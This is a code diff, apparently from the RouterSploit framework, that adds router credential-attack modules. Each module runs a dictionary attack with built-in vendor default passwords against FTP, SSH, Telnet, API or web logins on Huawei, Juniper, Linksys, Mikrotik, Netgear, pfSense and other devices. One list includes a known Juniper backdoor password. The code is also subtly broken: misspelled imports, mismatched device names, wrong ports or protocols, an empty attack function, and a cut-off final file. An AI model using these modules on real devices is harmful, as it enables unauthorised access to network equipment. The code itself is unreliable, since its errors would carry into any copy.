mode 100644 index 000000000..db048ef2a --- /dev/null +++ b/routersploit/modules/creds/routers/fortinet/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telne_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Fortinet Router Default Telnet Creds", + "description": "Module performs dictionary attack against Fortinet Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Fortinet Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:,maintainer:bcpb+serial#,maintainer:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/huawei/__init__.py b/routersploit/modules/creds/routers/huawei/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/huawei/ftp_default_creds.py b/routersploit/modules/creds/routers/huawei/ftp_default_creds.py new file mode 100644 index 000000000..916acb128 --- /dev/null +++ b/routersploit/modules/creds/routers/huawei/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Huawei Router Default FTP Creds", + "description": "Module performs dictionary attack against Huawei Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Huawei Router", + ), + } + + target = OptIP("", "Targe IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:,Admin:admin,user:user,vodafone:vodafone,user:HuaweiUser,telecomadmin:admintelecom,root:admin,digicel:digicel", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/huawei/ssh_default_creds.py b/routersploit/modules/creds/routers/huawei/ssh_default_creds.py new file mode 100644 index 000000000..cb01d0ab0 --- /dev/null +++ b/routersploit/modules/creds/routers/huawei/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Huawei Router Default SSH Creds", + "description": "Module performs dictionary attack against Huawei Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Huawei Router", + ), + } + + target = OptIP("", "Targe IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:,Admin:admin,user:user,vodafone:vodafone,user:HuaweiUser,telecomadmin:admintelecom,root:admin,digicel:digicel", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/huawei/telnet_default_creds.py b/routersploit/modules/creds/routers/huawei/telnet_default_creds.py new file mode 100644 index 000000000..6503fb25d --- /dev/null +++ b/routersploit/modules/creds/routers/huawei/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Huawei Router Default Telnet Creds", + "description": "Module performs dictionary attack against Huawei Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Huawei Router", + ), + } + + target = OptIP("", "Targe IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:,Admin:admin,user:user,vodafone:vodafone,user:HuaweiUser,telecomadmin:admintelecom,root:admin,digicel:digicel", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/ipfire/__init__.py b/routersploit/modules/creds/routers/ipfire/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/ipfire/ftp_default_creds.py b/routersploit/modules/creds/routers/ipfire/ftp_default_creds.py new file mode 100644 index 000000000..5e58d75b2 --- /dev/null +++ b/routersploit/modules/creds/routers/ipfire/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "IPFire Router Default FTP Creds", + "description": "Module performs dictionary attack against IPFire Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Juniper Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:abc123,super:juniper123,admin:<<< %s(un=\'%s\') = %u.", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/juniper/ssh_default_creds.py b/routersploit/modules/creds/routers/juniper/ssh_default_creds.py new file mode 100644 index 000000000..be8be83a3 --- /dev/null +++ b/routersploit/modules/creds/routers/juniper/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Juniper Router Default SSH Creds", + "description": "Module performs dictionary attack against Juniper Router SSH service. " + "If valid credentials are foundm they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Juniper Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:abc123,super:juniper123,admin:<<< %s(un='%s') = %u.", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/juniper/telnet_default_creds.py b/routersploit/modules/creds/routers/juniper/telnet_default_creds.py new file mode 100644 index 000000000..5d35bc434 --- /dev/null +++ b/routersploit/modules/creds/routers/juniper/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Juniper Router Default Telnet Creds", + "description": "Module performs dictionary attack against Juniper Router Telnet service. " + "If valid credentials are foundm they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Juniper Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:abc123,super:juniper123,admin:<<< %s(un=\'%s\') = %u.", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/linksys/__init__.py b/routersploit/modules/creds/routers/linksys/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/linksys/ftp_default_creds.py b/routersploit/modules/creds/routers/linksys/ftp_default_creds.py new file mode 100644 index 000000000..eb8151d67 --- /dev/null +++ b/routersploit/modules/creds/routers/linksys/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Linksys Router Default FTP Creds", + "description": "Module performs dictionary attack against Linksys Router FTP service." + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Linksys Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password,root:admin,linksys:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/linksys/ssh_default_creds.py b/routersploit/modules/creds/routers/linksys/ssh_default_creds.py new file mode 100644 index 000000000..0b943d61f --- /dev/null +++ b/routersploit/modules/creds/routers/linksys/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Linksys Router Default SSH Creds", + "description": "Module performs dictionary attack against Linksys Router SSH service." + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Linksys Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password,root:admin,linksys:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/linksys/telnet_default_creds.py b/routersploit/modules/creds/routers/linksys/telnet_default_creds.py new file mode 100644 index 000000000..2d212a837 --- /dev/null +++ b/routersploit/modules/creds/routers/linksys/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Linksys Router Default Telnet Creds", + "description": "Module performs dictionary attack against Linksys Router Telnet service." + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Linksys Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password,root:admin,linksys:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/mikrotik/__init__.py b/routersploit/modules/creds/routers/mikrotik/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py b/routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py new file mode 100644 index 000000000..feaed088f --- /dev/null +++ b/routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py @@ -0,0 +1,84 @@ +from routersploit.core.exploit import * +from routersploit.core.tcp.tcp_client import TCPClient +from routersploit.lib.apiros.apiros_client import ApiRosClient + + +class Exploit(TCPClient): + __info__ = { + "name": "Mikrotik Default Creds - API ROS", + "description": "", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Mikrotik Router", + ) + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(8728, "Target API port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") + stop_on_success = OptBool("true", "Stop on first valid authentication attempt") + verbosity = OptBool("true", "Display authentication attempts") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting default creds attack") + + data = LockedIterator(self.defaults) + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Login", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, running, creds): + while running.is_set(): + try: + username, password = creds.next().split(":") + + tcp_client = self.tcp_connect() + apiros = ApiRosClient(tcp_client) + + output = apiros.login(username, password) + + if output[0][0] == "!done": + if self.stop_on_success: + running.clear() + + print_success("Authentication Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + self.credentials.append((self.target, self.port, self.target_protocol, username, password)) + else: + print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity) + + tcp_client.close() + + except StopIteration: + break + + def check(self): + tcp_client = self.tcp_connect() + if tcp_client: + return True + + return False + + def check_default(self): + self.credentials = [] + + self.run_threads(self.target_function, self.defaults) + + if self.credentials: + return self.credentials diff --git a/routersploit/modules/creds/routers/mikrotik/ftp_default_creds.py b/routersploit/modules/creds/routers/mikrotik/ftp_default_creds.py new file mode 100644 index 000000000..f15909b10 --- /dev/null +++ b/routersploit/modules/creds/routers/mikrotik/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Mikrotik Router Default FTP Creds", + "description": "Module performs dictionary attack against Mikrotik Router FTP service." + "If valid credentials are found they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Mikrotik Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/mikrotik/ssh_default_creds.py b/routersploit/modules/creds/routers/mikrotik/ssh_default_creds.py new file mode 100644 index 000000000..1e3f46223 --- /dev/null +++ b/routersploit/modules/creds/routers/mikrotik/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Mikrotik Router Default SSH Creds", + "description": "Module performs dictionary attack against Mikrotik Router SSH service." + "If valid credentials are found they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Mikrotik Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/mikrotik/telnet_default_creds.py b/routersploit/modules/creds/routers/mikrotik/telnet_default_creds.py new file mode 100644 index 000000000..bf03aace6 --- /dev/null +++ b/routersploit/modules/creds/routers/mikrotik/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Mikrotik Router Default Telnet Creds", + "description": "Module performs dictionary attack against Mikrotik Router Telnet service." + "If valid credentials are found they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Mikrotik Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/movistar/__init__.py b/routersploit/modules/creds/routers/movistar/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/movistar/ftp_default_creds.py b/routersploit/modules/creds/routers/movistar/ftp_default_creds.py new file mode 100644 index 000000000..82af13ae2 --- /dev/null +++ b/routersploit/modules/creds/routers/movistar/ftp_default_creds.py @@ -0,0 +1,22 @@ +from rotersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Movistar Router Default FTP Creds", + "description": "Module performs dictionary attack against Movistar Router FTP service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Movistar Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,1234:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/movistar/ssh_default_creds.py b/routersploit/modules/creds/routers/movistar/ssh_default_creds.py new file mode 100644 index 000000000..83aa07ce2 --- /dev/null +++ b/routersploit/modules/creds/routers/movistar/ssh_default_creds.py @@ -0,0 +1,22 @@ +from rotersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Movistar Router Default SSH Creds", + "description": "Module performs dictionary attack against Movistar Router SSH service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Movistar Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,1234:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/movistar/telnet_default_creds.py b/routersploit/modules/creds/routers/movistar/telnet_default_creds.py new file mode 100644 index 000000000..8b93ac17d --- /dev/null +++ b/routersploit/modules/creds/routers/movistar/telnet_default_creds.py @@ -0,0 +1,22 @@ +from rotersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Movistar Router Default Telnet Creds", + "description": "Module performs dictionary attack against Movistar Router Telnet service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Movistar Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,1234:1234", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netcore/__init__.py b/routersploit/modules/creds/routers/netcore/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/netcore/ftp_default_creds.py b/routersploit/modules/creds/routers/netcore/ftp_default_creds.py new file mode 100644 index 000000000..d439cf802 --- /dev/null +++ b/routersploit/modules/creds/routers/netcore/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Netcore Router Default FTP Creds", + "description": "Module performs dictionary attack against Netcore Router FTP service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Netcore Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,guest:guest", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netcore/ssh_default_creds.py b/routersploit/modules/creds/routers/netcore/ssh_default_creds.py new file mode 100644 index 000000000..a5871f7f6 --- /dev/null +++ b/routersploit/modules/creds/routers/netcore/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Netcore Router Default SSH Creds", + "description": "Module performs dictionary attack against Netcore Router SSH service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Netcore Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,guest:guest", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netcore/telnet_default_creds.py b/routersploit/modules/creds/routers/netcore/telnet_default_creds.py new file mode 100644 index 000000000..1d9a585ac --- /dev/null +++ b/routersploit/modules/creds/routers/netcore/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Netcore Router Default Telnet Creds", + "description": "Module performs dictionary attack against Netcore Router Telnet service." + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Netcore Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,guest:guest", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netgear/__init__.py b/routersploit/modules/creds/routers/netgear/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/netgear/ftp_default_creds.py b/routersploit/modules/creds/routers/netgear/ftp_default_creds.py new file mode 100644 index 000000000..e8b454c3f --- /dev/null +++ b/routersploit/modules/creds/routers/netgear/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Netgear Router Default FTP Creds", + "description": "Module performs dictionary attack against Netgear Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Netgear Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:1234,admin:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netgear/ssh_default_creds.py b/routersploit/modules/creds/routers/netgear/ssh_default_creds.py new file mode 100644 index 000000000..eed270cf4 --- /dev/null +++ b/routersploit/modules/creds/routers/netgear/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Netgear Router Default SSH Creds", + "description": "Module performs dictionary attack against Netgear Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Netgear Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:1234,admin:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netgear/telnet_default_creds.py b/routersploit/modules/creds/routers/netgear/telnet_default_creds.py new file mode 100644 index 000000000..d1d98b9d8 --- /dev/null +++ b/routersploit/modules/creds/routers/netgear/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Netgear Router Default Telnet Creds", + "description": "Module performs dictionary attack against Netgear Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Netgear Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:1234,admin:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netsys/__init__.py b/routersploit/modules/creds/routers/netsys/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/netsys/ftp_default_creds.py b/routersploit/modules/creds/routers/netsys/ftp_default_creds.py new file mode 100644 index 000000000..c1ffc3cf4 --- /dev/null +++ b/routersploit/modules/creds/routers/netsys/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Netsys Router Default FTP Creds", + "description": "Module performs dictionary attack against Netsys Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "device": [ + "Netsys Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netsys/ssh_default_creds.py b/routersploit/modules/creds/routers/netsys/ssh_default_creds.py new file mode 100644 index 000000000..7867f909f --- /dev/null +++ b/routersploit/modules/creds/routers/netsys/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Netsys Router Default SSH Creds", + "description": "Module performs dictionary attack against Netsys Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "device": [ + "Netsys Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/netsys/telnet_default_creds.py b/routersploit/modules/creds/routers/netsys/telnet_default_creds.py new file mode 100644 index 000000000..a27a21e41 --- /dev/null +++ b/routersploit/modules/creds/routers/netsys/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Netsys Router Default Telnet Creds", + "description": "Module performs dictionary attack against Netsys Router Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "device": [ + "Netsys Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/pfsense/__init__.py b/routersploit/modules/creds/routers/pfsense/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/pfsense/ftp_default_creds.py b/routersploit/modules/creds/routers/pfsense/ftp_default_creds.py new file mode 100644 index 000000000..87dafbfde --- /dev/null +++ b/routersploit/modules/creds/routers/pfsense/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routrsploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "PFSense Router SSH Creds", + "description": "Module performs dictionary attack against PFSense Router SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "PFSense Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(80, "Target HTTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:pfsense", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/pfsense/ssh_default_creds.py b/routersploit/modules/creds/routers/pfsense/ssh_default_creds.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py b/routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py new file mode 100644 index 000000000..5a777d842 --- /dev/null +++ b/routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py @@ -0,0 +1,68 @@ +import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "PFSense Router Default Web Interface Creds - HTTP Form", + "description": "Module performs dictionary attack against PFSense Router web interface. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "PFSense Router", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(443, "Target Web Interface port") + ssl = OptBool("true", "SSL enabled: true/false") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:pfsense", "User:Pass or file with default credentials (file://)") + stop_on_success = OptBool("false", "Stop on first valid authentication attempt") + verbosity = OptBool("true", "Displaye authentication attempts") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting default creds attack") + + self.run_threads(self.threads, self.target_function, self.defaults) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, data): + username, password = data.split(":") + + + def check(self): + response = self.http_request( + method="GET", + path="/", + ) + if response is None: + return False + + if all([x in response.text + for x in ['', + 'var csrfMagicToken =']]): + return True + + return False + + def check_default(self): + return None diff --git a/routersploit/modules/creds/routers/technicolor/__init__.py b/routersploit/modules/creds/routers/technicolor/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/routers/technicolor/ftp_default_creds.py b/routersploit/modules/creds/routers/technicolor/ftp_default_creds.py new file mode 100644 index 000000000..9ca161a70 --- /dev/null +++ b/routersploit/modules/creds/routers/technicolor/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Technicolor Router Default FTP Creds", + "description": "Module performs dictionary attack against Technicolor Router FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Technicolor Router", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:password,admin:1234,Administrator:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/routers/technicolor/ssh_default_creds.py b/routersploit/modules/creds/routers/technicolor/ssh_default_creds.py new file mode 100644 index 